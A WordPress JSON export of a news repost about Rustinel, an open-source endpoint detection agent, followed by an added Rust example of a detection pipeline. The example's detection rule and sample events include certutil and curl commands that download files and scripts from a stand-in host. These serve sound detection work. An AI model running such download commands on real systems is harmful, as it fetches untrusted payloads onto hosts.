{"id":243379,"date":"2026-05-11T01:30:00","date_gmt":"2026-05-11T05:30:00","guid":{"rendered":"https:\/\/news-you-need.com\/index.php\/2026\/05\/11\/rustinel-open-source-endpoint-detection-for-windows-and-linux\/"},"modified":"2026-05-11T01:35:08","modified_gmt":"2026-05-11T05:35:08","slug":"rustinel-open-source-endpoint-detection-for-windows-and-linux","status":"publish","type":"post","link":"https:\/\/news-you-need.com\/index.php\/2026\/05\/11\/rustinel-open-source-endpoint-detection-for-windows-and-linux\/","title":{"rendered":"Rustinel: Open-source endpoint detection for Windows and Linux"},"content":{"rendered":"<p><a href=\"https:\/\/www.helpnetsecurity.com\/2026\/05\/11\/rustinel-open-source-endpoint-detection-windows-linux\/\">Rustinel: Open-source endpoint detection for Windows and Linux<\/a><\/p>\n<p><a href=\"https:\/\/www.helpnetsecurity.com\/2026\/05\/11\/rustinel-open-source-endpoint-detection-windows-linux\/\">https:\/\/www.helpnetsecurity.com\/2026\/05\/11\/rustinel-open-source-endpoint-detection-windows-linux\/<\/a><\/p>\n<p>Publish Date: 2026-05-11 01:30:00<\/p>\n<p>Source Domain: <a href=\"https:\/\/www.helpnetsecurity.com\">www.helpnetsecurity.com<\/a><\/p>\n<p>Open-source endpoint detection has long been split between Windows-focused tools built around Sysmon and Linux tools built around eBPF or auditd. Defenders running mixed environments have had to stitch together separate pipelines, separate rule sets, and separate maintenance burdens. Rustinel, a Rust-based endpoint agent, is an attempt to collapse that work into a single codebase.<\/p>\n<h3>A single agent across two operating systems<\/h3>\n<p>Rustinel collects telemetry through ETW on Windows and eBPF on Linux, normalizes the events into a shared model, and evaluates them against Sigma rules, YARA signatures, and atomic indicators of compromise. 
Alerts are written to disk as ECS-compatible NDJSON, a format that is easy to ship, parse, and integrate into SIEM or log-analysis pipelines such as Elastic or Splunk.<\/p>\n<p>Windows coverage spans process creation, image load, network, file, registry, DNS, PowerShell, WMI, service, and scheduled task events. Linux coverage currently includes process, network, file, and DNS telemetry. According to the project, Windows coverage remains broader for now, with Linux eBPF support continuing to expand.<\/p>\n<p>The agent runs in user mode on both platforms. On Windows it can be installed as a service. On Linux it requires kernel 5.8 or newer with BTF support and runs under root or a supervisor of the operator\u2019s choice. Active response is optional and can be set to dry-run, with allowlists that exempt trusted paths.<\/p>\n<h3>A user-mode design choice<\/h3>\n<p>Most commercial EDR products ship a kernel driver to obtain early visibility and tamper resistance. Rustinel takes a different path. Author Th\u00e9o Foucher said the choice was deliberate.<\/p>\n<p>\u201cMost commercial EDRs rely on a kernel driver for good reasons: tamper resistance, early visibility, and the ability to observe or block some activity before user-mode components see it. 
With Rustinel, I made a different design choice: stay as simple, transparent, and stable as possible while still collecting useful host&#8230;<\/p>\n<p><a href=\"https:\/\/www.helpnetsecurity.com\/2026\/05\/11\/rustinel-open-source-endpoint-detection-windows-linux\/\">Source<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Rustinel: Open-source endpoint detection for Windows and Linux https:\/\/www.helpnetsecurity.com\/2026\/05\/11\/rustinel-open-source-endpoint-detection-windows-linux\/ Publish Date: 2026-05-11 01:30:00 Source Domain:&#8230;<\/p>\n","protected":false},"author":1,"featured_media":243382,"comment_status":"closed","ping_status":"","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"https:\/\/img.helpnetsecurity.com\/wp-content\/uploads\/2026\/05\/05161542\/rustinel-1500.webp","fifu_image_alt":"","footnotes":""},"categories":[48],"tags":[71],"class_list":["post-243379","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-linux","tag-linux"],"_links":{"self":[{"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/posts\/243379"}],"collection":[{"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/comments?post=243379"}],"version-history":[{"count":1,"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/posts\/243379\/revisions"}],"predecessor-version":[{"id":243384,"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/posts\/243379\/revisions\/243384"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/media\/243382"}],"wp:attachment":[{"href":"https:\/\/news-you-need.com\/index.php\/wp-jso
n\/wp\/v2\/media?parent=243379"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/categories?post=243379"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/tags?post=243379"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
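The article summarizes Rustinel's pipeline in one sentence (platform telemetry in, a shared event model, Sigma evaluation, ECS-compatible NDJSON out) and mentions that active response can run in dry-run mode with allowlisted paths. The Rust program below is an added example written for this page; it is not Rustinel's code, and it does not use the project's APIs or rule loader. It assumes simplified stand-ins for what ETW and eBPF actually deliver (an image path plus command line on Windows, a filename plus argv on Linux), a hand-built rule in place of Sigma YAML with only the `contains` and `endswith` modifiers, a fixed set of ECS field names, and one reading of the allowlist semantics the article does not spell out: an allowlisted path still produces an alert but is exempt from any action. All sample events are constructed.

```rust
// Added example, not Rustinel's code: a miniature of the pipeline the article describes.
// ETW-shaped and eBPF-shaped records are normalized into one shared model, matched against
// a Sigma-style rule, run through a dry-run/allowlist response policy and written as
// ECS-compatible NDJSON. The ECS keys, rule, allowlist semantics and samples are assumptions.
#[derive(Debug, Clone, PartialEq)]
pub struct ProcessEvent {     // shared model: ECS fields both collectors can populate
    pub os: &'static str,     // host.os.type
    pub executable: String,   // process.executable
    pub command_line: String, // process.command_line
}

/// Raw collector output, simplified: ETW process-start fields on Windows, an exec tracepoint on Linux.
pub enum RawEvent {
    Etw { image: String, command_line: String },
    Ebpf { filename: String, argv: Vec<String> },
}

pub fn normalize(raw: &RawEvent) -> ProcessEvent {
    match raw {
        // NTFS paths compare case-insensitively, so fold case once here.
        RawEvent::Etw { image, command_line } =>
            ProcessEvent { os: "windows", executable: image.to_lowercase(), command_line: command_line.clone() },
        RawEvent::Ebpf { filename, argv } =>
            ProcessEvent { os: "linux", executable: filename.clone(), command_line: argv.join(" ") },
    }
}

/// Sigma-style rule: all selection entries must match (AND), any listed value may match (OR).
/// Only `|contains` and `|endswith` are implemented; matching is case-insensitive as in Sigma.
pub struct Rule { pub title: &'static str, pub selection: Vec<(&'static str, Vec<&'static str>)> }
/// Assumed rule: a command-line download utility fetching a URL, on either platform.
pub fn download_rule() -> Rule {
    Rule { title: "Command-line download utility fetching a remote URL", selection: vec![
        ("process.executable|endswith", vec!["\\certutil.exe", "/curl", "/wget"]),
        ("process.command_line|contains", vec!["http://", "https://"]) ] }
}

pub fn rule_matches(rule: &Rule, e: &ProcessEvent) -> bool {
    rule.selection.iter().all(|(key, values)| {
        let (name, modifier) = key.split_once('|').unwrap_or((*key, ""));
        let actual = match name {
            "process.executable" => e.executable.to_lowercase(),
            "process.command_line" => e.command_line.to_lowercase(),
            _ => String::new(), // an unknown field never matches
        };
        values.iter().any(|v| match modifier {
            "contains" => actual.contains(&v.to_lowercase()),
            "endswith" => actual.ends_with(&v.to_lowercase()),
            _ => actual == v.to_lowercase(),
        })
    })
}

/// Response policy (assumed): always alert; act only if active and not under an allowlisted prefix; dry-run only records.
pub fn decide(e: &ProcessEvent, active: bool, dry_run: bool, allowlist: &[&str]) -> &'static str {
    if !active || allowlist.iter().any(|p| e.executable.starts_with(*p)) { "alert-only" }
    else if dry_run { "would-terminate" } else { "terminate" }
}

/// Minimal JSON string escaping: quotes, backslashes and control characters (keeps one object per line).
fn json_str(s: &str) -> String {
    let mut out = String::from("\"");
    for c in s.chars() {
        match c {
            '"' => out.push_str("\\\""),
            '\\' => out.push_str("\\\\"),
            c if (c as u32) < 0x20 => out.push_str(&format!("\\u{:04x}", c as u32)),
            c => out.push(c),
        }
    }
    out + "\""
}

/// One ECS-shaped object per line with dotted keys, so a log shipper can tail the file.
pub fn to_ndjson(rule: &Rule, e: &ProcessEvent, action: &str) -> String {
    let fields = [
        ("event.kind", "alert"), ("event.action", action), ("rule.name", rule.title), ("host.os.type", e.os),
        ("process.executable", e.executable.as_str()), ("process.command_line", e.command_line.as_str()),
    ];
    format!("{{{}}}", fields.iter().map(|(k, v)| format!("{}:{}", json_str(k), json_str(v))).collect::<Vec<_>>().join(","))
}

/// Whole pipeline: normalize, match, decide, serialize; returns the alert lines.
pub fn run(batch: &[RawEvent], rule: &Rule, active: bool, dry_run: bool, allowlist: &[&str]) -> Vec<String> {
    batch.iter().map(normalize).filter(|e| rule_matches(rule, e))
        .map(|e| to_ndjson(rule, &e, decide(&e, active, dry_run, allowlist))).collect()
}

/// Constructed batch: certutil on Windows, curl from a Linux shell, curl under an
/// allowlisted backup path, and a benign package-manager exec that must not alert.
pub fn sample_batch() -> Vec<RawEvent> {
    vec![
        RawEvent::Etw { image: "C:\\Windows\\System32\\certutil.exe".into(),
            command_line: "certutil.exe -urlcache -split -f https://example.test/p.dat C:\\Users\\Public\\p.dat".into() },
        RawEvent::Ebpf { filename: "/usr/bin/curl".into(),
            argv: vec!["curl".into(), "-fsSL".into(), "https://example.test/x.sh".into(), "-o".into(), "/tmp/x.sh".into()] },
        RawEvent::Ebpf { filename: "/opt/backup/bin/curl".into(), argv: vec!["curl".into(), "https://backup.internal.test/m".into()] },
        RawEvent::Ebpf { filename: "/usr/bin/apt-get".into(), argv: vec!["apt-get".into(), "update".into()] },
    ]
}
```

Calling `run(&sample_batch(), &download_rule(), true, true, &["/opt/backup/"])` yields three lines: the certutil and `/usr/bin/curl` events carry `"event.action":"would-terminate"` because response is active but in dry-run, the allowlisted `/opt/backup/bin/curl` carries `"alert-only"`, and `apt-get` produces nothing. Two details are worth noting when reading it against the article. Case folding happens in `normalize` for Windows paths and again in `rule_matches` for every comparison, so a single rule body serves both platforms without per-OS variants. And the allowlist check runs before the dry-run check, so flipping dry-run off can never start acting on a trusted path; keep that ordering if you adapt the policy.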